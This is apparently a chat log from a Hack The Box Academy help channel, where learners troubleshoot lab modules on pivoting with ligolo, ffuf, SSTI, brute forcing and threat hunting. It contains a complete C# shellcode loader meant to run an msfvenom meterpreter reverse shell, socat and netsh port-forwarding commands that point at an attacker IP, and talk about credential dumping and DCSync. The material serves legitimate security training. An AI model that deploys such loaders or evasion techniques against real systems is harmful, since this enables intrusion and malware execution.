#modules

help!!

Restart the scan, restart the machine, change VPN? It's the right command

Gotta love this response when spwaning an instance

{ "success": 1, "ready": 0, "ip": null, "life_remaining": 119, "remaining_life_in_seconds": 7188 }

give me my IP 😠 😆

i am also no able to spwan my tagret...

Okay, who broke it

https://status.hackthebox.com/

I'll try again later 👀

Me too

same thing here

yeah stucked

I have downloaded the source code for codeigniter in the correct version and have been digging on the code, still havent found the right function

Module and Section: https://academy.hackthebox.com/module/158/section/1439

Use the concepts taught in this section to pivot to the Windows server at 172.16.6.155 (jason:WellConnected123!). Submit the contents of Flag.txt on Jason's Desktop.
I'm able to transfer the binaries, but once I extract the contents of SocksOverRDP x64, the .dll file disappears shortly after. Please advise.

Hello, I'm studying web vulnerabilities but I'm not a native english speaker.
In server side template injection mean, does template refer
A - Injection in the template
B - Injection of template
?

In the template i think

@jovial sable thank you. The available translations in my native language are incorrect

Like you inject the code due to a vulnerability on how the template is made, usually with <%%> or ${{}}, if im not wrong

@jovial sable yes, that's correct. I used the attack in several jinja labs and I agree with you.
It's just that I'm taking notes, and I wanted to have the proper interpretation (the tranlsation I have in my native language is a little bit misleading,,it literally translate into injection of template, hence my confusion)

oh, I undestand. So yep, option A has to be

@jovial sable I think you were right the first time, it makes more sense

(At least to me)

@jovial sable thanks a lot for your help

np : )

[CDSA][1 of 2] Intrusion Detection With Splunk (Real-world Scenario):
https://academy.hackthebox.com/module/218/section/2357
Hi guys/admins. I did some black box threat hunting and found some interesting stuff on the dataset for the said module that were not asked in the module exercises, as well as other things that needs to be verified such as:
||After the credential dumping via comsvcs.dll's minidump function (2022-11-06 11:44:07) on host (DESKTOP-EGSS5IS), the adversary proceeds in executing psexec related commands '
to enumerate the other host (10.0.0.47, DESKTOP-UN7T4R8) commands such has hostname, whoami or any generic situational awareness commands as well as network enum ones (2022-11-06 11:57:27) though I saw one command on 10.0.0.47 related to commandline: net user waldo Password@123 (2022-11-06 11:12:32). What's not clear to me is the net user command, would it be right to assume that prior to the dumping at DESKTOP-EGSS5IS, waldo created the user created the user waldo with password Password@123 via the net user waldo Password@123 since this event took place first before the dumping of credentials?
comsvcs.dll's minidump function (2022-11-06 11:44:07) on host DESKTOP-EGSS5IS
net user waldo Password@123 (2022-11-06 11:12:32) on host DESKTOP-UN7T4R8
[!] This comes to a fact as well that after the credential dumping event there's one successful login event from DESKTOP-EGSS5IS for the user waldo against DESKTOP-UN7T4R8 but
that is at 2022-11-06 11:59:59 which is normal given that there's credential dumping that took place, but I still can't figure it out how net user waldo Password@123 was
executed on DESKTOP-UN7T4R8 where in fact the dumping just took place after the net user related event?||

[CDSA][2 of 2] Intrusion Detection With Splunk (Real-world Scenario):
Hi guys/admins. I did some black box threat hunting and found some interesting stuff on the dataset for the said module that were not asked in the module exercises, as well as other things that needs to be verified such as:
||2. As for other attacks I've seen notepad.exe and cmd.exe was set to be a persistence mechanism as initiated by randomfile.exe on host DESKTOP-EGSS5IS
cmd.exe and notepad.exe was used to escalate privilege from user waldo > NT AUTHORITY\SYSTEM upon its execution as a persistence mechanism on 2022-11-08
(Please confirm this finding)
3. I saw SharpHound.exe and file.exe being fetched by the adversary via PS' Invoke-WebRequest on DESKTOP-EGSS5IS. tools used agains the domain and its users as of now I don't see anything other than these 2 (Please confirm this finding)
4. Invoke-DCSync.ps1 was downloaded on DESKTOP-UN7T4R8. (Please confirm this finding)
5. Was able to see a DCsync attack related artifact via Windows Event ID 4662 user waldo being the culprit for that. Can you confirm if the DC controller is host WIN-HSRME76TRAD.uniwaldo.local? (Please confirm this finding)
6. Aside fromn SharpHound.exe being invoked on DESKTOP-EGSS5IS and Invoke-DCSync.ps1 invoked on DESKTOP-UN7T4R8 are there any other steps that I've missed or any major attacks against the DC? (Please confirm this finding)||

About the .dll "Defender may try to stand in your way"

Ohhhhh, so that's why it disappeared.

I didn't even end up using the technique, I just kept RDP'ing to the final host 💀

Learning ligolo rn and then I'll try the lab's method and then with ligolo.

Well it's always good to know for the future, .dll/.exe who magically disappear = Defender/some kind of security measure, but probably Defender for a CTF

hey guys, I want to start hack the box academy's soc analyst job role path, how long does it take approximately in hours? it's written there 23 days, does it mean 552 hours? or is it a module a day?

Login Brute Forcing > Skills Assessment - Service Login

I am having trouble with the first question, which asks me to use the information from the previous module to create a custom password wordlist that meets password policy and use usernameGenerator to generate potential usernames, then brute force the SSH server on the target host.

I have managed to narrow down the potential username to ||h.potter|| and the worldlist I created with ccup is failing to get a hit. I only used the first and last name to generate the password list (and allowed for special characters) but im not getting hits. Do I have the right username? If so, should I revisit my password list?

If you start with 0 experience it's usually (much) longer than the estimated time, but the theory is 1 day = 8 hours

thanks

Yeah, thanks for telling me, it hadn't even occured to me. And the usual notification you get when it happens on a personal machine didn't show so I never realized. Thanks!

@next bronze with ligolo or any tool, it's not possible to do run an nmap -sS scan on a pivot, right?

ligolo can

Btw do you know how I can reset all the network routes and NICs that I've added?

u can manually delete them
or restart your host

Is there a way to know which were the default to begin with?

So I don't accidentally delete something I'm not supposed to?

im only familiar with ligolo, so if a route or interface was added "ligolo" name would be there

Alrighty

Ffuf assessment last question. I found the wordlist. Found values. Tried all of them, nothing worked . With curl -X POST
https://academy.hackthebox.com/module/54/section/511

I've just learnt that listener's can be added to compromised hosts with listener_add but how do we do it on Windows hosts?

That's managed through the ligolo console on your host in the session of the agent

Oh okay, noted.

Guess I should fire up ligolo and test it out instead of just reading. It'll give me a better idea.

box you done the Ffuf assesment yet?

Yeah but i don't remember what i did though

mind if i dm whit what i tried?

ok

can somebody help me with the module INTRODUCTION TO WINDOWS EVASION TECHNIQUES / Static Analysis?
the code below, when paste in the shellcode, should make a reverse shell to the handler right?

code:
using System;
using System.Linq;
using System.Runtime.InteropServices;

namespace NotMalware
{
internal class Program
{
[DllImport("kernel32")]
private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

    [DllImport("kernel32")]
    private static extern bool VirtualProtect(IntPtr lpAddress, uint dwSize, UInt32 flNewProtect, out UInt32 lpflOldProtect);

    [DllImport("kernel32")]
    private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, IntPtr lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);

    [DllImport("kernel32")]
    private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

    static void Main(string[] args)
    {
        // Shellcode (msfvenom -p windows/x64/meterpreter/reverse_http LHOST=... LPORT=... -f csharp)
        byte[] buf = new byte[] {<SNIP>};

        // Allocate RW space for shellcode
        IntPtr lpStartAddress = VirtualAlloc(IntPtr.Zero, (UInt32)buf.Length, 0x1000, 0x04);

        // Copy shellcode into allocated space
        Marshal.Copy(buf, 0, lpStartAddress, buf.Length);

        // Make shellcode in memory executable
        UInt32 lpflOldProtect;
        VirtualProtect(lpStartAddress, (UInt32)buf.Length, 0x20, out lpflOldProtect);

        // Execute the shellcode in a new thread
        UInt32 lpThreadId = 0;
        IntPtr hThread = CreateThread(0, 0, lpStartAddress, IntPtr.Zero, 0, ref lpThreadId);

        // Wait until the shellcode is done executing
        WaitForSingleObject(hThread, 0xffffffff);
    }
}

}

when no help is in this forum, anybody knows where to write?

you need to be patient young padawan

I was...but have been asking for some time...😆

are you able to help?

i dont get it.
C:\Tools\NotMalware\NotMalware\bin\Debug>.\NotMalware.exe
Shellcode allocated at: 2D60000
Shellcode copied to allocated space.
Shellcode memory protection set to executable.
Shellcode execution thread created.

time to break out the debugger

or add pauses in your program so that it can be examined

i did this with the statements above.
C:\Tools\NotMalware\NotMalware\bin\Debug>.\NotMalware.exe
Shellcode allocated at: 2D60000
Shellcode copied to allocated space.
Shellcode memory protection set to executable.
Shellcode execution thread created.

seems to work

@muted kindle If I've started an smb server on the attack host that I wish to access from PC-2, what listener on ligolo do I need to add to PC-1?

I've tried adding the following listener on PC-1, but couldn't access the smb share:

listener_add --addr 0.0.0.0:1234 --to 0.0.0.0:445

I don’t think you can do it like that because windows defaults to 445 for smb

But doesn't the command I type mean that when I send the connection request to port 1234 via PC-1, it'll redirect it to port 445 on my attack host? 🤔

Yes
But accessing share on windows use 445 always
It’ll be accessing the share of pc-1

Also, after I tried deleting the listener, this happened 💀

Can I DM you what I did so far?

If you want to transfer files to pc2, set up a Python web server,
If you want to get files out setup uploadserver
The file transfer module teaches how to use

TE.CL section lab from HTTP Attacks module:

Could you give me any hint? What wrong I do?

So I need to transfer it to PC-1 first and then to the attack host? No direct method?

?
If you host uploadserver on port 8000 for example
You can add listener on pc1 for 8888 forward to you at 8000
Then on pc2 it use curl or some script to upload the file to pc1:8888

Yeah, I understood that concept, and I tried applying the same logic to an SMB share, but you're saying something about windows using 445 by default that I don't get? I'm making the smb connection request to 1234 tho?

How do you get the UNC path to use 1234

If you can do that I’m not aware of it

UNC?

You want pc2 to reach your share yes? So it has to use \\yourIP\share

But how do you do that to use PC1 IP at port 1234

There are some direct methods, like
./socat TCP4-LISTEN:1234,fork TCP4:10.10.14.165:445 if PC1 is a linux machine
netsh.exe interface portproxy add v4tov4 listenport=1234 listenaddress=0.0.0.0 connectport=445 connectaddress=10.10.14.165 if PC1 is a windows machine
I didn't do it with ligolo-ng yet though

I was thinking something like \\PC-1_IP:1234\share, no?

Can u try it

I had to kill my ligolo session cuz of the error, I'll reconnect and try it and let you know.

doesn't work like that, windows will always go to 445 when pointed to a smb path

In my previous attempt I forgot the port.

not to mention that smb also needs 139 so you'll need to forward multiple ports

just use http/s

Oh okay.

But have I understood the port forwarding with ligolo correctly so far? 😅

Yes

Thanks you guys.

I'm gonna give double pivoting a go now.

can somebody help me with the module INTRODUCTION TO WINDOWS EVASION TECHNIQUES / Static Analysis?
i try to get the reverse shell as explained, the reverse shell works when i just use a normal .exe created with msfvenom, but when i use the C# code it doesnt work

Bump

where can i write for help if here nobody can help?

here

seems not to work

well, this is done by volunteering so it is not mandatory

exactly, and my question is, is there another way to get help?

yes or no?

I don't know

ok

@next bronze @muted kindle
I RDP'd to PC-2 (172.16.5.19) from PC-1 (172.16.5.150), but when I try to ping either of the IP addresses from PC-1, I get destination host unreachable. Also, I find the subnets a little weird?

where are you pinging from

and what's your tunnel set up

https://tenor.com/view/tag-gif-13161012535429590073

I've already given some suggestions, if you want to do maldev, learn to debug your own program, you have the code and the binary

and i replied already to you, with:
i did this with the statements above.
C:\Tools\NotMalware\NotMalware\bin\Debug>.\NotMalware.exe
Shellcode allocated at: 2D60000
Shellcode copied to allocated space.
Shellcode memory protection set to executable.
Shellcode execution thread created.

seems to work

I'm telling you to debug it yourself, not me

i have added the debug prints

where i did i tell you to debug my code?

Yes it should make a reverse shell via HTTP

I was pinging directly from PC-1's command prompt.

I'm pretty much following your write up, so I've just got the one tun interface you created at the start.

Have you placed any breakpoints?

Attached a debugger while its running?

by sending me the debug output?

The pinging issue asside, I'm currently trying to double pivot, but I'm getting this error.

^ excatly what I said earlier

double pivot requires creating another device iirc
like ligolo2
then new route to ligolo2
start --tun ligolo2 for the agent

pc2 might be blocking ping, but if you can rdp from pc1 then there's a route there

or you can stop the first tunnel and start the second tunnel

Ahh ok. Can I also kill the first tunnel connection and use that tun interface? But I guess best practice would be to create a new tun interface like you said.

both will work

Okay, great. So it depends on my situation and need of retaining access to pc-1.

oh i didn't know tht

exactly

it used to work like that until the recent multi tunnel update

Ah okay, it might be blocking ping since I couldn't ping even through my attack host. But what' with the IP addressing? How am I able to access an the /23 IP on PC-2 from /16 IP on PC-1?

pc1's got 2 interfaces, attach the second pivot to the interface that can reach pc2

Ah I didn't read entire history, my bad :D

I would suggest not using csharp at all but the course I did was all in C so im biased :D

Yeah, I got that.

I prefer C too but that module is done in C#

My current question lies with the IP addressing scheme.

fellow maldev academy enjoyer

🤝 yessir

10/10 worth the price lol

am i tripping or is the loading icon not moving
Was it always like that?

oh it spawned

The second IP address on PC-1 has the IP address 172.16.5.150/16 and from there I was able to directly RDP to PC-2 on the IP 172.16.5.19/23, and then when I did ipconfig in the command prompt on PC-2, I found another interface with the IP 172.16.6.19/16.

yeah what about it? if you just want to reach pc2, you can ignore that interface

This is what doesn't make sense to me. I'm able to directly reach from PC-1's /16 subnet to PC-2's /23 subnet, and then the other interface on PC-2 is a /16 subnet that let's me pivot further.

PC-1/16 → PC-2/23?

whats wrong with that

I was expecting it to be PC-1/16 → PC-2/16, and then using PC-2/23 subnet to pivot further.

Maybe I'm not understanding the networking here properly. I know there are overlapping host ranges between the two subnets, so why is it that I can't directly access the last host (PC-3), which has an IP address of 172.16.6.155, directly from PC-2 without having to double pivot?

that's not how subnetting works, the mask only determines the range of the subnet

go use a subnet calculator for the two subnets if you're confused

I understand the mask determines the range, but I calculated the range, and PC-3 should fall within the /16, subnet.

PC-3 falls within the Host range for both subnets.

whys there a pc3 now

I'm on the same double pivoting section This is the setup for a bird's eye view.

you can just assume that the routes between the pcs are by design, there can be firewall or routing configurations affercting things

I see. Hypothetically though, this question is just to confirm my networking knowledge, let's say the firewall or routing configurations weren't present, then PC-2 and PC-3 should be directly accessible from PC-1, yes?

I hadn't considered this, was racking my brain thinking I'd forgotten how basic networking worked. Thanks. My mind's been so focused on using ligolo to pivot, I missed considering it.

if it's just a direct connection, yeah

Alrighty, thanks a lot for bearing with me and my questions. I really appreciate it.

Btw if I stop the tunnel for my next pivot, won't it break the chain?

how many pivots are there now

yes i tried. and have sent the output before. i dont know...

Just the pivot on PC-1 that lets me access PC-2.

I now want to go from PC-2 to PC-3.

that's fine, the agent will still be connected even if you stop the tunnel

at least for double pivots

have you checked the allocated memory region to see if your shellcode was allocated correctly?

I am pretty sure something wrong with Attack Common Services -> Attacking FTP VM. It has been like 30 mins but FTP service is still not ON. Where should I report this issue?

Oh, okay. wow.

So I'm guessing it ain't a feasible method for more than 2 pivots perhaps? In that case, what's best practice? To keep creating new tunnels and tun interfaces?

I don't remember the last time I've had to use more than 2 tunnels, but the multi tunnel feature will work for this

I just stopped my tunnel, and I lost my xfreerdp session to PC-2.

yeah if you stop the tunnel it will kill the connection to the hosts that are not the pivot

I'm talking about the agent itself that is still running, of course the tunnel is stopped

for me it seems to be okei?

Ah okay, so if the agent is still running, is there a method to reinitiate the tunnel?

check the memory region after you copy the shellcode into memory

just start it again

Haha, alrighty.

@next bronze did you finish maldev?

yeah

ah nice, i didnt get far lol, had to pivot to web pen testing to fill in some knowledge

got to module 33

did it during my free time, tbh I haven't used any of the knowledge in my actual work and don't think I will anytime soon, but still a blast to learn nonetheless

did you get the lifetime sub

of course 😋

What is the customized version of the POP3 server?
any hint to solve this?
Footprinting -> IMAP/POP3

thats why im not too fussed about finishing it ASAP

yeah then just take your time with it

are you compiling according to the instructions in the module?

hey hacker lets hack nasa

seems also to be okei, no?

i think so. or what do you mean? i have not Encrypted it. but i i think i followed exactly the module the point where in the section he got the meterpreter session

use x64dbg to attach to the process and go to the allocated memory region and see if your shellcode is actually copied into the memory correctly

dope website dude, gonna give it a read 🧐

help!!!

your program is in the debug folder, idk if that will make a difference but follow excatly the requirements in the module

thank you sir

if nothing else works use a debugger

I managed to do it. Thanks a lot for your help @next bronze

What is the customized version of the POP3 server?
Help me with this

try using nmap scripting engine

oh my god. thank you!

it was set to x32

thanks also for your help, really appreciate it

Btw @next bronze when I stop a listener, I get this error. How do I stop it?

idk tbh, just don't stop them

that's also a thing caused by the new update

Hi guys, i'm in module Linux Fundamentals, i installed openvpn and ran the academy's vpn, but when i go to the target vm, i was landed in a Apache2 Ubuntu default page. What should i do to fix this? Thanks

correct port and web directory?

it seems correct, got Initialization Sequence Completed in terminal, ping looks good too

Wat section and question is this ?

Linux Fundamentals - The Shell - System Information, i just cant connect to the target vm to answer questions

Below the spawn target it says ssh with the given credentials

Remote login to the target with ssh

I have just finished the Linux Fundamentals section, if I wanted to run back through it again at a later date is it a case of just spawning a new target and rinse and repeat?

ah, i missed that part, thank you for the help

What is the admin email address?
Try to access the emails on the IMAP server and submit the flag as the answer. (Format: HTB{...})
Help me solve this

how should i do this?

If you read emails you can get email addresses

Log into the imap service with your known user, and read their emails

i cant find email address, which command i should use give me a hint

You should be fetching the body of the email

Still currently stuck on this if anyone is able to provide any insight. Mainly just wanting to know if im on the right track and just need to be patient or if i've fucked up somewhere in the process. I'm struggling to troubleshoot this myself.

I suggest looking up imap commands, I've linked to a few articles in the past

can you pin me out on that

Just use discord search feature

Or Google "imap commands"

web assesment final question. A small nudge pls?
i have found a short username wordlist from seclists
i have found the parameters
i have tried all usernames but i only get method no longer used and with one a combo i tried outside of that wordlist, you dont have access

@fathom pendant can you help me find how to find an inverse wifi compatability?

should i post the commands ive used here?

and why is my handle still unverified, should i contact support?

Invalid method means the parameter isn't correct iirc

Read and follow #welcome

my bad..tnx
just verified, it said verification error contact online mod for help?

yes, I have found both parameters that dont need another username as value im assuming, so the wordlist is were im having an issue with. I have the parameters. I cant find the right wordlist to fuzz the other value to gain the flag w curl. Either that or im not understanding something.

You're not understanding something

You need to find a proper parameter (there will only be one) and then fuzz the value

i found it

this user does not have access

error is what i get, so im assuming the user exists

Well, keep trying until you get a user that does

its not the pass?

ive tried the whole wordlist mentioned on the forum website on both parameters

To be clear: you're doing the attacking web applications with ffuf module?

https://academy.hackthebox.com/module/54/section/511

Yep you get 2 parameters

Because you already linked your acc to your alt discord probably

Module: Broken Authentication
Section: Skill Assessment
Hey in the module broken authentication how can you tell how many digits the OTP has in the skill assessment? I can't find it anywhere on the page and I tried 4,5, and 6 digits.

thank you kindly

And fuzzing the value with a namelist will get you something @cloud wigeon

ok, ill keep trying

thank you

You should use the namelist that's highlighted throughout the module

which i am

ill re read it

Make sure your headers are correct as well

parameter=FUZZ

And the content-type

?parameter=FUZZ and -X POST ..

That's not how post requests work

-d parameter=FUZZ

yes

encapsulated by single quotes

dont want to copy paste the whole cmd as spoiler

Then why are you adding ?parameter 😉

ok

gotcha tnx for pointing out

Crackmapexec - skills assessment
I am stuck at question 5. Can someone please write to me and give me some tips on how to complete the module?

What is the host discovery command ya'll prefer to use?

I'm currently trying to perform host discovery to hunt for something I could pivot to using this command:

sudo nmap -sn <ip_addr/CIDR>

That search bar is so helpful thanks mentioning it the other day

Sometimes I forget it exists, thanks 😂

haha ya I thought a while back why would someone need that and now im thinking how much data is stored on this discord

Can I do write-ups for HTB Academy modules now that the write-ups are accessible on-site when paid.

I think u can make write ups for tier 0.

How do ya'll perform host discovery on a subnet that blocks ping?

DNS

nmap -Pn scan

That disabled ICMP Echo Ping, right? So doesn't it result in using ARP ping?

https://help.hackthebox.com/en/articles/5188925-streaming-writeups-walkthrough-guidelines

I am running into the same issue. I can evade Defender and YARA. My payload works when launched from the command line in EVASION-TARGET, but it does not work when launched automatically. Could someone help me shed some light here? Thanks.

you can do -sS for SYN scan

So this?

nmap -sS -Pn <ip_addr>

i made mistake remove -Pn

I'm doing "LINUX PRIVILEGE ESCALATION" / "Linux Services & Internals Enumeration". The question in the end of the module about the latest version of Python on box, what they actually want as the answer? There's several python binaries, but nothing matches.

that scan will take forever though

ideally if you're in an AD environment you want to find the domain controller and some valid credentials

then use adidnsdump to find all the hosts in the network

someone tell me why i can't connect me on vm attack (ACADEMY-EA-ATTACK01) for this section ?https://academy.hackthebox.com/module/143/section/1275

I cant login to my HTB account + i try to reset password nothing is sent to my email where do i get assistance about this issue : )

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

No

chat bot doesnt work

Give it a minute

It's not like there's thousands of support agents waiting for a chat

It's not uncommon to need to wait a handful of minutes to an hour before getting a response, as they may be responding to another support request

how do you get scriptkiddie/hacker rank btw

By advancing on the main website, doing active boxes

how are you on the same rank as me im dogshit compared to u cuh

Because I don't do main platform content atm

what sort of cyber activities you smokin on?

None, just got a lot going on

Hi, I'm reading the 'Host and Port Scanning' section of the nmap module and it says this about TCP Connect scans:
It is also useful when the target host has a personal firewall that drops incoming packets but allows outgoing packets. In this case, a Connect scan can bypass the firewall and accurately determine the state of the target ports.
I don't understand why this scan would bypass a target's firewall that drops incoming packets. Wouldn't the initial SYN packet from nmap just get dropped?

Hi. I am not sure if this is the right place to ask, but does anyone know if it is possible to "return" a subscription? I accidentally pressed purchase on the Silver subscription, which was surprisingly easy to accidentally purchase. I have not yet accessed any modules that I didn't already purchase with cubes beforehand. (Also I JUST purchased it like 15 minutes ago, so it is quite recent)

Message support

How do I know where the flag.txt file was downloaded

It's not something that can be taken care of via discord

It's your current directory you launched ftp from

thx

how do I get the script kiddie rank ?

By leveling up in the main site

As I said earlier, rank isn't tied to academy progress

ye im doing these starting machine labs but the ydotn seem to gimme points

Because they have to be active. Starting point isn't "active" machines, and since they have writeups as well - they also don't contribute

ahh ok

command injection skill assessment, can i get some help?

i found the injection point and bypassed many filters but i still get malicious request detected

has anyone ever tried to read the flag with powerupsql? i succeeded with mssqlclient.py but i'm trying to find a way to display the flag with a system command. https://academy.hackthebox.com/module/143/section/1275

why is my wordlist like this on kali linux?

doesnt let me extract it either

Use sudo

my kali crashed when i tried opening the file lol

Well, because its a big wordlist

If you don't have enough storage space then your system isn't gonna like it

Anyway to get free cubes

complete modules

and u can invite people apparently but it didnt work for me

invited my brother and it never gave me any cubes

even though he signed up

through my link

But unlocking modules need cubes

you will get the cube if your referral buys certain plans/subscription

Hello, can anyone explain me, where is kira's "cracked password" or what they mean by that? https://academy.hackthebox.com/module/147/section/1322 I did all past modules but didnt save any of the passwords. should I check them again? or I need to do smt else?

Always keep passwords that you've cracked, they very likely will come in handy as you progress through a module

Unless you have Kira's password that you cracked saved somewhere, you'll need to go ahead and get it again

Alr thanks, I will do it.

ahha finally got the broken authentication flag 😛

that was a fun module

No

Its a low %

anyone ?

MODULE: Advanced SQL Injection
SECTION: Common Character Bypass
URL: https://academy.hackthebox.com/module/188/section/1997

Are we meant to know a set of valid credentials to login with to the application? To my knowledge, the /find-user endpoint is only reachable if you are already logged-in.

EDIT (solved): You can create your own account.

I did try to ask earlier, but it got missed in the feed... If you complete a module can you go back and run through the practical elements as much as you like? just doing my CREST path so lots of content to consume. Thanks

idk any of these channels so im just gonna type here
is the academy just text based or does it have videos where they're explained

Text based as far as I've seen, but every module has lots of practical labs.

After launching a win machine in the course roughly how long does it take to be able to RDP into? some communities can be up to like 5 minutes?

No videos, but there are practical labs

I've never had to wait more than a couple of minutes but obviously sometimes there's some latency but switching VPN servers seems to help

Usually 5-10 minutes is the safe bet

ah ok thanks

I will say any win machine with internal machines that you need to pivot into, those take a while from my experience

i found the interface pretty friendly so ill stick with it this time

You can likely find video guides on the tier 0 content

But tier 1+ videos aren't allowed

do certifications cost money

Yes

so

thanks very much, and can I run back through the practical content as much as I like? thanks just trying to plan my study

Any cert that holds value will cost some amount of money

to say i completed this i need to pay 400 dollars

Yes

thank you

yay i finished the intro

No. You can complete a job role path without taking the certification exam

lol

what

The cert isn't just "oh I completed the path" it's, "I took an exam that proves my competency in the exam material, and can write a professional report"

sorry can you explain it to me like im a caveman that just found out about fire

The path is a requirement to be able to take the exam in the first place

Pentester path for CPTS, Bug Bounty Hunter for CBBH, SOC analyst for CDSA, Senior Web Pentester for CWEE

They are all pinned in their respective channels

bro you sound so professional rn and im scared of making you mad

There's no "lol you completed this, here's a cert" kinda thing

It's a full exam to be able to get the cert, like OSCP

but, i dont know crap about this stuff thats why im learning, i just know how to code a discord bot in python nothing more

Yep and that's why you can't take the respective exams without first completing the required path

idk what these oscp cpts or what they are

amazing

OSCP is the industry standard pentest cert, CPTS is HTB's competitor cert to it

ohh

Your resume isn't even likely to get looked at if you don't have it (for Jr pentest position)

wait theres jobs for this

Yes, penetration testing is a legit job

holy crap this is awesome

It's hard as fuck to get your foot in the door though

although that name is kind of... suspicious someone could mistake it for something else

Most people start SOC (Security Operation Center) and pivot to it

There's companies that do this, there's contracts and such for it

They are well defined and scoped

wow

man, you sound professional asf rn and im here for it

well that's where the ethical side of ethical hacking comes in ¯_(ツ)_/¯

Most people just do public bug bounties, as they can be done by anyone with the skills

i figured out how to use sqlmap and now i can just screenshot it and scare some 5 year olds or some crap, i sent a screenshot of 2 game hacking apps from my phone to my friend, dude sent a voice memo screaming im calling the police if you dare

Meh

yeah meh truly

i got scared for my sake cause he's that stupid he'd actually call them i swear

As long as you aren't doing anything illegal, you're fine

Decompiling a game isn't necessarily illegal, unless the company clearly states so in its ToS

yeah uhh

it was basically for getting modded games or paid games for free, happymod but looked more professional ig, i might learn how to use cheat engine

Attacking live sites that don't have a bug bounty program, however, I'd advise against it

I suggest refraining from talking about cracking games

can i attack my own sites?

#rules

ohh mb mb

Yes, they're yours

would i get in any trouble with the hosting provider or something

Most hosting sites pass the testing onto the customer

ah ok

thanks for explaining all this to me btw

I suggest looking into ToS if you're unsure

yeah but sites be making that crap long on purpose so you can't read it, roblox literally said it does that

Skill Issue then

fair

Responsibly, any services you pay for, you should read the ToS

As EULAs and ToS are legally binding contracts

yeah i never pay for anything online i always gotta find a free alternative

bro pls stop you're making me anxious

Well downloading cracks is an easy way to get your computer infected

only thing legally related i did was add privacy policy and tos to my shopify store, and that thing tired me tf out let alone all these other things

huh, im talking about for example shopify is paid, i find something thats free

We're driving way off topic now

oh yeah i forgot sorry

If you want to talk in other channels, read and follow #welcome

oh

they should have put it in verify or something ive been searching this entire time lmao ty im stupid

just my two cents the information in these courses will give you the ability to do many things its a question of your ethics and morals as to what you do with it hence you have white hat and black hats, much like anything you can either use it for good or bad either way you still have to learn how to use it

HTB spins it in a professional way, the modules and labs are framed in a way that you and imaginary colleagues were contracted to test the fictional company InlaneFreight

i just want to state this incase anyone i know is reading this, i dont know what any of this is dont talk to me about it cause i swear i dont know either

yeah that looks more suspicious doesnt it

No one knows shit about fuck my guy

respect

Things evolve and change every day

i feel like the kid eating at the adults table rn

HTB strives to build a strong foundation for you to further research and expand on

And as per one of the big guys G0blin, they are planning to keep things as reasonably affordable as possible

I was always taught to be the dumbest person in a room its how you learn most, I am on a learning path like the rest of us. just asking the right questions helps

Compared to OSCP, CPTS costs a fraction

That's a username that's typing lmao

idk man, ive been the dumbest for 9 years now and i think i need to repeat primary school

My best advice, take notes, create your own personal grimoire of tricks and links

and my username is true btw, idk why they think that

The best notes are ones that you understand

i just know english and can read the settings in a device and suddenly im a hacking prodigy

yeah ill keep that in mind

Copy/pasting only gets you so far if you don't understand

learned that the hard way actually when i lost all the code to my discord bot, im in pain now cause i cant rewrite it like how i used chatgpt when i started

If you don't know why you use a tool, then you don't understand what to do when faced with an unfamiliar situation

chatGPT can be used as a tool for understanding, however, don't let it replace your actual brain

We will make fun of you for it lol

@fathom pendant how big is your forehead

and I shall accept it with grace

Irrelevant

was calling you smart but ok

Either way. Take notes, if it seems important -- write it down

A lot of basic modules will break commands down

btw

cubes can be earned for free right

No

ill be checking in here more, i like this server

im getting a job

Tier 1+ modules only refund 20% and you never go positive by just doing modules

You can also message support regarding getting the academic discount

$8/month

oh ok

thanks, ill be going now.

Gl

Module: Login Brute Forcing > Skills Assessment - Service Login

I am having trouble with the first question, which asks me to use the information from the previous module to create a custom password wordlist that meets password policy and use usernameGenerator to generate potential usernames, then brute force the SSH server on the target host.

I have managed to narrow down the potential username to ||h.potter|| and the worldlist I created with ccup is failing to get a hit. I only used the first and last name to generate the password list (and allowed for special characters) but im not getting hits. Do I have the right username? Am I on the right track or have I made a mistake here?

How to set white background for academy modules ?

there's probably some theme addon out there for something like that

in chrome ?

or firefox ?

idk, search for either one you use

you can also manually edit the css style sheet maybe

why would you want to blind yourself though lol

ah.... found something.

Just trasitioning habits

Just finished the footprinting module, the medium and hard test boxes are no joke. Medium took longer than hard 😂

The irony

haha

Some people have vision issues and dark background actually makes it harder to read

probably have vision issues from using white backgrounds their whole life 😛

Or other vision acuity issues

Hello, for INTRODUCTION TO THREAT HUNTING & HUNTING WITH ELASTIC (Hunting for Stuxbot)
https://academy.hackthebox.com/module/214/section/2285
Can someone from the admin, confirm if a AMSIBypass took place for the following screenshot:

As analyzing the related Windows Event Code 4104 for this that involves a shell code has a resemblance with the known AMSIBypass from @am0nsec

I’m trying to download a file to get a flag but I can’t figure it out can anyone help?

What module are you working on

You need to give us enough info to be able to help you
Module name; section name; what's causing you trouble

hey, i have almost completed cpts 85 % , now i was thinking does the defense part going to be ez or it doesn't matter

Was there in depth evasion tactics in the course? No

You'll only encounter on the exam what you encounter in the path

beside cpts which path u follow marcie

I haven't finished the path yet and don't plan on doing anything extra

Anyone else having issues spawning targets again? Module : blind sql injections. Section: skill assessment

Been waiting for 6 minutes now 😅

try changing servers

It won’t stop the spawning it seems. Just killed the pwnbox

huh? refresh the page and it will let you spawn again

It didn’t 😅 There we go, after 9 minutes

Finally. Maybe the lab is that big 😨

Working now. This is gonna be a fun one

Module: PIVOTING, TUNNELING, AND PORT FORWARDING
Section: Skills Assessment

I'm currently struggling with discovering hosts from my double pivot.
I've already done the setup in ligolo for Pivot02, but I'm not sure if it's correct. It wouldn't let me add the route 172.16.0.0/16 for ligolo2 as well, so I added the route 172.16.6.0/24 instead.

After doing this, I tried a ping sweep on 172.16.6.0/24 and it returned a bunch of hosts. I used this command for the ping sweep:

for i in {1..254} ;do (ping -c 1 172.16.6.$i | grep "bytes from" &) ;done

Now I don't know which host to proceed with.

Tried to perform a ping sweep from Pivot02 itself, resulted in nothing. This was the command:

for /L %i in (1 1 254) do ping 172.16.6.%i -n 1 -w 100 | find "Reply"

well ive finished the introduction finally
but
i still cant unlock the introduction to bash scripting because i have no cubes

Module: ADCS attacks
Section: Skills assessment

To get initial access to DEV01, I tried to use ESC8 but the coerce failed (using coercer or petitpotam.py). Can someone give me a hint? thanks

Hi all!

